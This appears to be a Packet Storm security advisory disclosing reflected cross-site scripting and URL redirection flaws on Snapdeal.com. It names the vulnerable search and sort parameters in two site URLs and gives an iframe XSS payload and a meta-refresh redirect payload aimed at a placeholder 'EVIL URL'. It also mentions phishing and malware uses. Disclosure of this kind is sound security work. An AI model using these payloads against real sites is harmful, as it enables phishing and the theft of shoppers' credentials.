Snapdeal.com suffers from cross site scripting and URL redirection vulnerabilities.
8341259c808aa3333216afbcade6c36a1cab7644ed9a71b97c912a4891740db4Site: http://www.snapdeal.com
Threat/Vulnerability: Cross site scripting a.k.a XSS, URL Redirection
Severity : Moderate
Author: Karthik R a.k.a 3psil0nlambda
I have informed the owner (CEO) but got no response, acknowledgement of receipt of the mail.
About the Site:
India's fastest growing shopping site.
Vulnerability:
*XSS a.k.a Cross site scripting
*URL Redirection
Once found out the Vulnerability, it can be used in the following URL to create any attacks.
*Installing malware in the name of Snapdeal.com and gain credit card and other important credentials
*Phishing URL Redirection, and gain login-ID and password
URL used for crafting attacks:-
*http://www.snapdeal.com/search?categoryId=0&keyword= <inject XSS attack here> &vertical=all&clickSrc=go_recent&locId=0
*http://www.snapdeal.com/products/lifestyle-handbags-wallets?q=Brand:Jute Planet,A-maze&sort= <inject XSS attack here>
Exploit:
*XSS : "><IFRAME SRC="javascript:alert('XSS');"></IFRAME>
*URL Redirection: "><meta HTTP-EQUIV="REFRESH" content="0; url=EVIL URL">
Greetz to side-effects, r4dc0re, lord crusader, team inject0r
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed